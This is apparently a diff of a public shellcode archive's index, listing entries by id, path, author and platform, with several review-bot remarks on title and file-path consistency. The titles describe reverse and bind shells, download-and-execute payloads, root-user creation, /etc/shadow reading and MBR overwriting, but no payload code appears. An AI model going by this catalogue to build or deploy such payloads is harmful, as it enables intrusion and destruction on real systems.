41827,shellcodes/windows_x86-64/41827.txt,"Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
41883,shellcodes/linux_x86-64/41883.txt,"Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86
41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
42016,shellcodes/windows/42016.asm,"Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64
41970,shellcodes/linux_x86-64/41970.asm,"Linux/x64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
42016,shellcodes/windows/42016.asm,"Windows - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
42126,shellcodes/linux_x86-64/42126.c,"Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64
42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64
42179,shellcodes/linux_x86-64/42179.c,"Linux/x64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64
42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86
42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86
42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
42339,shellcodes/linux_x86-64/42339.c,"Linux/x64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
42522,shellcodes/linux_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42523,shellcodes/linux_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42485,shellcodes/linux_x86-64/42485.c,"Linux/x64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
42522,shellcodes/linux_x86-64/42522.c,"Linux/x64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42523,shellcodes/linux_x86-64/42523.c,"Linux/x64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42594,shellcodes/linux_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,linux_x86
42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
42791,shellcodes/linux_x86-64/42791.c,"Linux/x64 - mkdir(evil) Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86
42992,shellcodes/windows_x86-64/42992.c,"Windows/x86-64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
42992,shellcodes/windows_x86-64/42992.c,"Windows/x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86
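Review bot: the 42016 row goes from `Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)` to `Windows - cmd.exe Shellcode (718 bytes)`, dropping both architectures, whereas the other renamed rows in this hunk only swap `x86-64` for `x64`. If the entry covers both architectures, keep them in the title (for example `Windows/x64 / x86`) so a title search by architecture still finds it. Separately, 41750 and 41827 change their file extension from `.txt` to `.asm` along with the title, so check that the files themselves are renamed in this commit; the unchanged 41630 row also still spells `exceve`.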

1 id file description date author type platform
2 14113 shellcodes/arm/14113.txt shellcodes/arm/14113.c Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes) 2010-06-29 Jonathan Salwan shellcode arm
3 13241 shellcodes/aix/13241.c AIX - execve(/bin/sh) Shellcode (88 bytes) 2004-09-26 Georgi Guninski shellcode aix
4 13242 shellcodes/bsd/13242.txt BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes) 2000-11-19 Scrippie shellcode bsd
5 13243 shellcodes/bsd_ppc/13243.c BSD/PPC - execve(/bin/sh) Shellcode (128 bytes) 2004-09-26 Palante shellcode bsd_ppc
36 13276 shellcodes/freebsd_x86/13276.c FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes) 2004-09-26 Claes M. Nyberg shellcode freebsd_x86
37 13277 shellcodes/freebsd_x86/13277.c FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes) 2004-09-26 Claes M. Nyberg shellcode freebsd_x86
38 13278 shellcodes/freebsd_x86/13278.asm FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes) 2004-09-26 Scrippie shellcode freebsd_x86
39 13279 shellcodes/freebsd_x86-64/13279.c FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes) FreeBSD/x64 - exec /bin/sh Shellcode (31 bytes) 2009-05-18 Hack'n Roll shellcode freebsd_x86-64
40 13280 shellcodes/freebsd_x86-64/13280.c FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes) FreeBSD/x64 - execve(/bin/sh) Shellcode (34 bytes) 2009-05-15 c0d3_z3r0 shellcode freebsd_x86-64
41 13281 shellcodes/generator/13281.c Linux/x86 - execve() + Null-Free Shellcode (Generator) 2009-06-29 certaindeath shellcode generator
42 13282 shellcodes/generator/13282.php Linux/x86 - Bind TCP Shell Shellcode (Generator) 2009-06-09 Jonathan Salwan shellcode generator
43 13283 shellcodes/generator/13283.php Windows (XP SP1) - Bind TCP Shell Shellcode (Generator) 2009-06-09 Jonathan Salwan shellcode generator
51 13292 shellcodes/hardware/13292.asm Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) 2008-08-13 Varun Uppal shellcode hardware
52 13293 shellcodes/hardware/13293.asm Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode 2008-08-13 Gyan Chawdhary shellcode hardware
53 13295 shellcodes/hp-ux/13295.c HP-UX - execve(/bin/sh) Shellcode (58 bytes) 2004-09-26 K2 shellcode hp-ux
54 13296 shellcodes/linux_x86-64/13296.c Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes) Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes) 2008-11-28 gat3way shellcode linux_x86-64
55 13297 shellcodes/generator/13297.c Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator) Linux/x64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator) 2006-04-21 phar shellcode generator
56 13298 shellcodes/linux_mips/13298.c Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes) 2008-08-18 vaicebine shellcode linux_mips
57 13299 shellcodes/linux_mips/13299.c Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes) 2008-08-18 vaicebine shellcode linux_mips
58 13300 shellcodes/linux_mips/13300.c Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes) 2005-11-09 core shellcode linux_mips
75 13317 shellcodes/linux_x86/13317.s Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes) 2009-06-08 Jonathan Salwan shellcode linux_x86
76 13318 shellcodes/linux_x86/13318.s Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes) 2009-06-08 Jonathan Salwan shellcode linux_x86
77 13319 shellcodes/linux_x86/13319.s Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes) 2009-06-01 Jonathan Salwan shellcode linux_x86
78 13320 shellcodes/linux_x86-64/13320.c Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) 2009-05-14 evil.xi4oyu shellcode linux_x86-64
79 13321 shellcodes/linux_x86/13321.c Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes) 2009-04-30 phar shellcode linux_x86
80 13322 shellcodes/linux_x86/13322.c Linux/x86 - File Unlinker Shellcode (18+ bytes) 2009-03-03 darkjoker shellcode linux_x86
81 13323 shellcodes/linux_x86/13323.c Linux/x86 - Perl Script Execution Shellcode (99+ bytes) 2009-03-03 darkjoker shellcode linux_x86
179 13421 shellcodes/linux_x86/13421.c Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes) 2004-12-22 xort shellcode linux_x86
180 13422 shellcodes/linux_x86/13422.c Linux/x86 - execve() Shellcode (23 bytes) 2004-11-15 marcetam shellcode linux_x86
181 13423 shellcodes/linux_x86/13423.c Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes) 2004-11-15 zasta shellcode linux_x86
182 13424 shellcodes/linux_x86/13424.txt shellcodes/linux_x86/13424.c Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes) 2004-09-26 RaiSe shellcode linux_x86
183 13425 shellcodes/linux_x86/13425.c Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes) 2004-09-26 anathema shellcode linux_x86
184 13426 shellcodes/bsd_x86/13426.c BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes) 2004-09-26 dev0id shellcode bsd_x86
185 13427 shellcodes/linux_x86/13427.c Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes) 2004-09-26 Tora shellcode linux_x86
218 13460 shellcodes/linux_x86/13460.c Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes) 2000-08-08 anonymous shellcode linux_x86
219 13461 shellcodes/linux_x86/13461.c Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes) 2000-08-07 anonymous shellcode linux_x86
220 13462 shellcodes/linux_x86/13462.c Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes) 2000-08-07 anonymous shellcode linux_x86
221 13463 shellcodes/linux_x86-64/13463.c Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes) 2009-05-18 evil.xi4oyu shellcode linux_x86-64
222 13464 shellcodes/linux_x86-64/13464.s Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes) Linux/x64 - execve(/bin/sh) Shellcode (33 bytes) 2006-11-02 hophet shellcode linux_x86-64
223 13465 shellcodes/multiple/13465.c Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes) 2005-11-15 Charles Stevenson shellcode multiple
224 13466 shellcodes/multiple/13466.c OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes) 2005-11-13 nemo shellcode multiple
225 13467 shellcodes/multiple/13467.c Linux/x86 / Unix/SPARC / IRIX/MIPS - execve(/bin/sh) Shellcode (141 bytes) 2004-09-12 dymitri shellcode multiple
229 13471 shellcodes/netbsd_x86/13471.c NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
230 13472 shellcodes/netbsd_x86/13472.c NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
231 13473 shellcodes/netbsd_x86/13473.c NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
232 13474 shellcodes/netbsd_x86/13474.txt shellcodes/netbsd_x86/13474.c NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes) 2004-09-26 humble shellcode netbsd_x86
233 13475 shellcodes/openbsd_x86/13475.c OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) 2006-05-01 hophet shellcode openbsd_x86
234 13476 shellcodes/openbsd_x86/13476.c OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes) 2004-09-26 Sinan Eren shellcode openbsd_x86
235 13477 shellcodes/openbsd_x86/13477.c OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes) 2004-09-26 anonymous shellcode openbsd_x86
249 13491 shellcodes/generator/13491.c Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator) 2006-07-21 xort shellcode generator
250 13492 shellcodes/solaris_sparc/13492.c Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes) 2005-11-20 lhall shellcode solaris_sparc
251 13493 shellcodes/solaris_sparc/13493.c Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes) 2005-11-20 lhall shellcode solaris_sparc
252 13494 shellcodes/solaris_sparc/13494.txt shellcodes/solaris_sparc/13494.c Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes) 2004-09-26 LSD-PLaNET shellcode solaris_sparc
253 13495 shellcodes/solaris_sparc/13495.c Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes) 2004-09-26 Claes M. Nyberg shellcode solaris_sparc
254 13496 shellcodes/solaris_sparc/13496.c Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes) 2004-09-26 Claes M. Nyberg shellcode solaris_sparc
255 13497 shellcodes/solaris_sparc/13497.txt shellcodes/solaris_sparc/13497.c Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes) 2000-11-19 dopesquad.net shellcode solaris_sparc
256 13498 shellcodes/generator/13498.php Solaris/x86 - Bind TCP Shell Shellcode (Generator) 2009-06-16 Jonathan Salwan shellcode generator
257 13499 shellcodes/solaris_x86/13499.c Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes) 2008-12-02 sm4x shellcode solaris_x86
258 13500 shellcodes/solaris_x86/13500.c Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes) 2008-12-02 sm4x shellcode solaris_x86
259 13501 shellcodes/solaris_x86/13501.txt shellcodes/solaris_x86/13501.c Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes) 2004-09-26 anonymous shellcode solaris_x86
260 13502 shellcodes/solaris_x86/13502.txt shellcodes/solaris_x86/13502.c Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes) 2004-09-26 anonymous shellcode solaris_x86
261 13503 shellcodes/unixware/13503.txt shellcodes/unixware/13503.c UnixWare - execve(/bin/sh) Shellcode (95 bytes) 2004-09-26 K2 shellcode unixware
262 13504 shellcodes/windows_x86/13504.asm Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode 2009-07-27 Skylined shellcode windows_x86
263 13505 shellcodes/windows_x86/13505.c Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes) 2009-07-17 Stack shellcode windows_x86
264 13507 shellcodes/windows_x86/13507.txt Windows/x86 - Egg Omelet SEH Shellcode 2009-03-16 Skylined shellcode windows_x86
268 13511 shellcodes/windows_x86/13511.c Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes) 2009-02-03 Stack shellcode windows_x86
269 13512 shellcodes/windows_x86/13512.c Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + Alphanumeric Shellcode (67 bytes) 2008-09-03 Koshi shellcode windows_x86
270 13513 shellcodes/windows_x86/13513.c Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + ASCII Printable Shellcode (49 bytes) 2008-09-03 Koshi shellcode windows_x86
271 13514 shellcodes/windows_x86/13514.asm Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode Windows/x86 - Reverse TCP + Download File + Save + Execute Shellcode 2008-08-25 loco shellcode windows_x86
272 13515 shellcodes/generator/13515.pl Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator) 2008-03-14 YAG KOHHA shellcode generator
273 13516 shellcodes/windows_x86/13516.asm Windows/x86 - Download File + Execute Shellcode (192 bytes) 2007-06-27 czy shellcode windows_x86
274 13517 shellcodes/windows_x86/13517.asm Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes) 2007-06-14 Weiss shellcode windows_x86
287 13530 shellcodes/windows_x86/13530.asm Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode 2004-09-26 Peter Winter-Smith shellcode windows_x86
288 13531 shellcodes/windows_x86/13531.c Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes) 2004-09-26 silicon shellcode windows_x86
289 13532 shellcodes/windows_x86/13532.asm Windows - DCOM RPC2 Universal Shellcode 2003-10-09 anonymous shellcode windows_x86
290 13533 shellcodes/windows_x86-64/13533.asm Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) Windows/x64 - URLDownloadToFileA(http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) 2006-08-07 Weiss shellcode windows_x86-64
291 13548 shellcodes/linux_x86/13548.asm Linux/x86 - Kill All Processes Shellcode (9 bytes) 2010-01-14 root@thegibson shellcode linux_x86
292 13549 shellcodes/linux_x86/13549.c Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes) 2009-12-04 ka0x shellcode linux_x86
293 13550 shellcodes/linux_x86/13550.c Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes) 2009-12-04 ka0x shellcode linux_x86
295 13553 shellcodes/linux_x86/13553.c Linux/x86 - execve() Shellcode (51 bytes) 2009-12-04 fl0 fl0w shellcode linux_x86
296 13560 shellcodes/windows/13560.txt Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes) 2009-12-14 anonymous shellcode windows
297 13563 shellcodes/linux_x86/13563.asm Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes) 2010-01-15 root@thegibson shellcode linux_x86
298 13565 shellcodes/windows_x86/13565.asm Windows/x86 (XP SP3) - ShellExecuteA Shellcode Windows/x86 (XP SP3) - ShellExecuteA() Shellcode 2009-12-19 sinn3r shellcode windows_x86
299 13566 shellcodes/linux_x86/13566.c Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode 2009-12-19 mr_me shellcode linux_x86
300 13569 shellcodes/windows_x86/13569.asm Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode 2009-12-24 sinn3r shellcode windows_x86
301 13570 shellcodes/freebsd_x86/13570.c FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes) 2009-12-24 sbz shellcode freebsd_x86
304 13574 shellcodes/windows_x86/13574.c Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes) 2009-12-28 AnTi SeCuRe shellcode windows_x86
305 13576 shellcodes/linux_x86/13576.asm Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes) 2010-01-16 root@thegibson shellcode linux_x86
306 13577 shellcodes/linux_x86/13577.txt Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes) 2009-12-30 root@thegibson shellcode linux_x86
307 13578 shellcodes/linux_x86/13578.txt shellcodes/linux_x86/13578.asm Linux/x86 - Fork Bomb Shellcode (6 bytes) (1) 2009-12-30 root@thegibson shellcode linux_x86
308 13579 shellcodes/linux_x86/13579.c Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes) 2009-12-31 $andman shellcode linux_x86
309 13581 shellcodes/windows/13581.txt Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes) 2010-01-03 Aodrulez shellcode windows
310 13582 shellcodes/windows/13582.txt Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes) Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes) 2010-01-03 Aodrulez shellcode windows
311 13586 shellcodes/linux_x86/13586.txt shellcodes/linux_x86/13586.asm Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes) 2010-01-08 root@thegibson shellcode linux_x86
312 13595 shellcodes/windows_x86/13595.c Windows/x86 (XP SP2) (French) - calc.exe Shellcode (19 bytes) 2010-01-20 SkuLL-HackeR shellcode windows_x86
313 13599 shellcodes/linux_x86/13599.txt shellcodes/linux_x86/13599.c Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
314 13600 shellcodes/linux_x86/13600.txt shellcodes/linux_x86/13600.c Linux/x86 - ip6tables -F Shellcode (47 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
315 13601 shellcodes/linux_x86/13601.txt shellcodes/linux_x86/13601.c Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
316 13602 shellcodes/linux_x86/13602.txt shellcodes/linux_x86/13602.c Linux/i686 - pacman -R <package> Shellcode (59 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
317 13609 shellcodes/linux_x86/13609.c Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes) 2010-02-09 fb1h2s shellcode linux_x86
318 13614 shellcodes/windows_x86/13614.c Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes) 2010-02-10 Hellcode Research shellcode windows_x86
319 13615 shellcodes/windows_x86/13615.c Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes) 2010-02-10 Hellcode Research shellcode windows_x86
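Review bot: in row 13582 the old and new titles are identical as rendered ("Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)"), so the edit is presumably whitespace only and cannot be reviewed from this view; please confirm what was meant to change. The .txt to .asm/.c path changes in this hunk (13578, 13586, 13599 through 13602) also need the matching file renames in the same commit, otherwise the index points at paths that do not exist.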
322 13630 shellcodes/windows_x86/13630.c Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes) 2010-02-28 Hazem mofeed shellcode windows_x86
323 13631 shellcodes/windows_x86/13631.c Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes) 2010-03-01 Hazem mofeed shellcode windows_x86
324 13632 shellcodes/linux_x86/13632.c Linux/x86 - Disable modsecurity Shellcode (64 bytes) 2010-03-04 sekfault shellcode linux_x86
325 13635 shellcodes/windows_x86/13635.txt shellcodes/windows_x86/13635.as Windows/x86 - JITed Stage-0 Shellcode 2010-03-07 Alexey Sintsov shellcode windows_x86
326 13636 shellcodes/windows_x86/13636.c Windows/x86 - JITed exec notepad Shellcode 2010-03-08 Alexey Sintsov shellcode windows_x86
327 13639 shellcodes/windows_x86/13639.c Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes) 2010-03-11 Stoke shellcode windows_x86
328 13642 shellcodes/windows_x86/13642.txt shellcodes/windows_x86/13642.asm Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes) Windows/x86 (XP SP2) - WinExec(write.exe) + ExitProcess Shellcode (16 bytes) 2010-03-18 czy shellcode windows_x86
329 13645 shellcodes/windows/13645.c Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode 2010-03-20 Alexey Sintsov shellcode windows
330 13647 shellcodes/windows_x86/13647.txt Windows/x86 (XP SP3) (Russia) - WinExec(cmd.exe) + ExitProcess Shellcode (12 bytes) 2010-03-24 lord Kelvin shellcode windows_x86
331 13648 shellcodes/windows_x86/13648.rb Windows/x86 - MessageBox Shellcode (Metasploit) Windows/x86 - MessageBox Shellcode (Generator) (Metasploit) 2010-03-24 corelanc0d3r shellcode windows_x86
332 13649 shellcodes/windows/13649.txt shellcodes/windows/13649.as Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode 2010-03-27 Alexey Sintsov shellcode windows
333 13661 shellcodes/linux_x86/13661.txt Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode 2010-04-02 anonymous shellcode linux_x86
334 13669 shellcodes/linux_x86/13669.c Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes) 2010-04-14 Magnefikko shellcode linux_x86
335 13670 shellcodes/linux_x86/13670.c Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) 2010-04-14 Magnefikko shellcode linux_x86
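Review bot: row 13648 gains "(Generator)" in its title but stays at shellcodes/windows_x86/13648.rb with platform windows_x86, while the other "(Generator)" rows in this index (for example 13515 and 17326) live under shellcodes/generator/ with platform generator. Either move the file and set the platform column to generator, or drop the tag from the title, so that filtering by platform and filtering by title return the same set.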
342 13680 shellcodes/linux_x86/13680.c Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes) 2010-04-21 Jonathan Salwan shellcode linux_x86
343 13681 shellcodes/linux_x86/13681.c Linux/x86 - Fork Bomb Shellcode (6 bytes) (2) 2010-04-21 Jonathan Salwan shellcode linux_x86
344 13682 shellcodes/linux_x86/13682.c Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes) 2010-04-22 Magnefikko shellcode linux_x86
345 13688 shellcodes/linux_x86-64/13688.c Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes) Linux/x64 - reboot(POWER_OFF) Shellcode (19 bytes) 2010-04-25 zbt shellcode linux_x86-64
346 13691 shellcodes/linux_x86-64/13691.c Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes) Linux/x64 - execve(/bin/sh) Shellcode (30 bytes) 2010-04-25 zbt shellcode linux_x86-64
347 13692 shellcodes/linux_x86/13692.c Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes) 2010-04-25 condis shellcode linux_x86
348 13697 shellcodes/linux_x86/13697.c Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes) 2010-05-04 Jonathan Salwan shellcode linux_x86
349 13698 shellcodes/linux_x86/13698.c Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes) 2010-05-05 Jonathan Salwan shellcode linux_x86
